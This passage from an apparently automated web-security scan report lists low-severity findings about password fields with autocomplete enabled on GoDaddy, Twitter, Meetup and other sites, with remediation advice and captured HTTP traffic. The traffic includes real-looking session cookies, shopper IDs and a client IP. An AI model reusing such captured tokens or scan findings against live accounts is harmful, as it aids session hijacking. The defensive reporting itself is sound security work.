TSfd06f3=af2d54c7f076f956f2dbdb3dbd2252bb34fb6f4d2b0d40564e629da2286023f2bc9f06c5948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12. Password field with autocomplete enabled previous next
There are 36 instances of this issue:

https://cart.godaddy.com/basket.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
https://idp.godaddy.com/retrieveaccount.aspx
http://twitter.com/
http://twitter.com/
http://twitter.com/
http://vasco.com/login.aspx
http://vasco.com/user_registration.aspx
https://www.cheapssls.com/index.php
http://www.godaddy.com/Payment/payment-options.aspx
http://www.godaddy.com/affiliates/affiliate-program.aspx
http://www.godaddy.com/gdshop/offers/cross_sell.asp
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.meetup.com/
http://www.meetup.com/
http://www.meetup.com/Boston-BizSpark-Meetup/
http://www.meetup.com/Boston-BizSpark-Meetup/
http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
http://www.meetup.com/sponsorships/
http://www.meetup.com/sponsorships/
http://www.meetup.com/whats_new/
http://www.meetup.com/whats_new/
https://www.microcad.ca/auth/login
https://www.sslmatrix.com/Order/quickorder
https://www.sslmatrix.com/Order/quickorder
https://www.sslmatrix.com/ssl-promotion-code
https://www.sslmatrix.com/ssl-promotion-code/ssl-price

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?isc=%22&ci=9106&spkey=GDCARTNET-M1PWCARTWEB009&target=https%3a%2f%2fcart.godaddy.com%2fbasket.aspx%3fapp%255Fhdr%3d&transferCart=true&shopper_id_old=46215871

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.2. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3a%2f%2fwww.godaddy.com%2faffiliates%2faffiliate-program.aspx

The form contains the following password field with autocomplete enabled:

Request

POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3A%2F%2Fwww.godaddy.com%2Faffiliates%2Faffiliate-program.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: http://www.godaddy.com/affiliates/affiliate-program.aspx
Content-Length: 88
Cache-Control: max-age=0
Origin: http://www.godaddy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; adc1=US; currency1=potableSourceStr=USD; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=

validate=1&login_focus=false&pass_focus=false&loginname=&password=&Login.x=42&Login.y=17

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:26:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...


<form name="Form1" method="post" action="login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101&target=http%3a%2f%2fwww.godaddy.com%2faffiliates%2faffiliate-program.aspx" id="Form1" style="margin: 0; padding: 0;">
<div>
...[SNIP]...
<td class="normal_text">
               <input name="Login$userEntryPanel2$PasswordTextBox" type="password" maxlength="50" id="Login_userEntryPanel2_PasswordTextBox" onkeypress="return processPasswordKeypress(event);" style="width:175px;" />


           </td>
...[SNIP]...

12.3. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3a%2f%2fwww.godaddy.com%2fssl%2fssl-certificates.aspx

The form contains the following password field with autocomplete enabled:

Request

POST /login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: http://www.godaddy.com/ssl/ssl-certificates.aspx
Content-Length: 88
Cache-Control: max-age=0
Origin: http://www.godaddy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; traffic=; adc1=US; currency1=potableSourceStr=USD; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40

validate=1&login_focus=false&pass_focus=false&loginname=&password=&Login.x=41&Login.y=12

Response

12.4. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fproducts%2faccountlist.aspx

The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fproducts%2faccountlist.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; adc1=US; currency1=potableSourceStr=USD; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii

Response

12.5. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDMYA-M1PWMYAWEB006

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.6. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.7. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:26:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:51 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/Payment/payment-options.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=11266%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=17; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101" onsubmit="return pcj_login_action(this);">
<div class="login-box username">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.8. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fAccount%2fAccountSettings%2fAccountSettings.aspx

The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fAccount%2fAccountSettings%2fAccountSettings.aspx HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; pathway=4f057259-4645-4223-96aa-98d6262a1c68; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=3; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB006&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; ShopperId1=ndqiadmiugedwezalcdaffdhwjpgihjc

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:26:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:26:50 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB006&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB006&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB006&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/
Set-Cookie: traffic=cookies=1&referrer=https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx&sitename=mya.godaddy.com&page=/Default.aspx&server=M1PWMYAWEB006&status=200 OK&querystring=idpinfo=none&myaurl=%2fdefault.aspx&shopper=46215684&privatelabelid=1&isc=&clientip=50.23.123.106&referringpath=4f057259-4645-4223-96aa-98d6262a1c68&referringdomain=&split=24; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...


<form name="Form1" method="post" action="login.aspx?SPKey=GDMYA-M1PWMYAWEB006&redirect=false&myaurl=%2fAccount%2fAccountSettings%2fAccountSettings.aspx" id="Form1" style="margin: 0; padding: 0;">
<div>
...[SNIP]...
<td class="normal_text">
               <input name="Login$userEntryPanel2$PasswordTextBox" type="password" maxlength="50" id="Login_userEntryPanel2_PasswordTextBox" onkeypress="return processPasswordKeypress(event);" style="width:175px;" />


           </td>
...[SNIP]...

12.9. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109

The form contains the following password field with autocomplete enabled:

password

Request

GET /retrieveaccount.aspx?ci=50103&spkey=GDSWNET-M1PWCORPWEB109 HTTP/1.1
Host: idp.godaddy.com
Connection: keep-alive
Referer: https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB109&target=http%3A%2F%2Fwww.godaddy.com%2Fssl%2Fssl-certificates.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; ASP.NET_SessionId=pwylm3umzkrcsc3bnf5ymbnz; adc1=US; currency1=potableSourceStr=USD; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=4f057259-4645-4223-96aa-98d6262a1c68; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; traffic=

Response

12.10. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The page contains a form with the following action URL:

https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB101

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.11. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/signup

The form contains the following password field with autocomplete enabled:

user[user_password]

Request

GET / HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/projects/wwt/contest.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1314976448.1; __utmz=43838368.1314976448.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; original_referer=fwhwi6Y0ffDC4jPtZF8dmmmty0iyoL%2B01UcGagyOYMVYvRuikxaIletcbtJnwOmKkSWbw5%2B8n4MFGbMW0LYNsQ%3D%3D; external_referer=fwhwi6Y0ffDC4jPtZF8dmmmty0iyoL%2B01UcGagyOYMVYvRuikxaIletcbtJnwOmKkSWbw5%2B8n4MFGbMW0LYNsQ%3D%3D%7C0; _twitter_sess=BAh7CToOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbXNmdHJlc2Vh%250AcmNoOg9jcmVhdGVkX2F0bCsILPBjLzIBOgdpZCIlYzBmNzRjZjk3MDM4ODFj%250AOTY0MDg0NGNiMmIxZDBmNzQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--225e1c0a58b84458253a04692444019e934f415a

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:04:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055071-41784-59541
ETag: "aec220d2e94a47445b8c29787a579d9e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:04:31 GMT
X-Runtime: 0.01296
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 739cf79cd76a3368cfe15487620dd315f8303417
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbXNmdHJlc2Vh%250AcmNoOg9jcmVhdGVkX2F0bCsILPBjLzIBIgpmbGFzaElDOidBY3Rpb25Db250%250Acm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYzBm%250ANzRjZjk3MDM4ODFjOTY0MDg0NGNiMmIxZDBmNzQ%253D--e88597cf7fe708f50c7e3819dc018c21a00605ee; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50566
Connection: close

<!DOCTYPE html>
<html>
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<meta name="description" content="Instantly connect to
...[SNIP]...
</h3>
<form action="https://twitter.com/signup" class="signup signup-btn" method="post">
<div class="holding name">
...[SNIP]...
<div class="holding password">
<input type="password" value="" name="user[user_password]"/>
<span class="holder">
...[SNIP]...

12.12. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions?phx=1

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:04:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055071-41784-59541
ETag: "aec220d2e94a47445b8c29787a579d9e"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:04:31 GMT
X-Runtime: 0.01296
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 739cf79cd76a3368cfe15487620dd315f8303417
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbXNmdHJlc2Vh%250AcmNoOg9jcmVhdGVkX2F0bCsILPBjLzIBIgpmbGFzaElDOidBY3Rpb25Db250%250Acm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYzBm%250ANzRjZjk3MDM4ODFjOTY0MDg0NGNiMmIxZDBmNzQ%253D--e88597cf7fe708f50c7e3819dc018c21a00605ee; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Content-Length: 50566
Connection: close

<!DOCTYPE html>
<html>
<head>

<title>Twitter</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8" />

<meta name="description" content="Instantly connect to
...[SNIP]...
<div id="signin-dropdown" class="dropdown dark">
<form action="https://twitter.com/sessions?phx=1" class="signin" method="post">
<fieldset class="textbox">
...[SNIP]...
</span>
<input type="password" value="" name="session[password]" />
</label>
...[SNIP]...

12.13. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions?phx=1

The form contains the following password field with autocomplete enabled:

session[password]

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:04:31 GMT
Server: hi
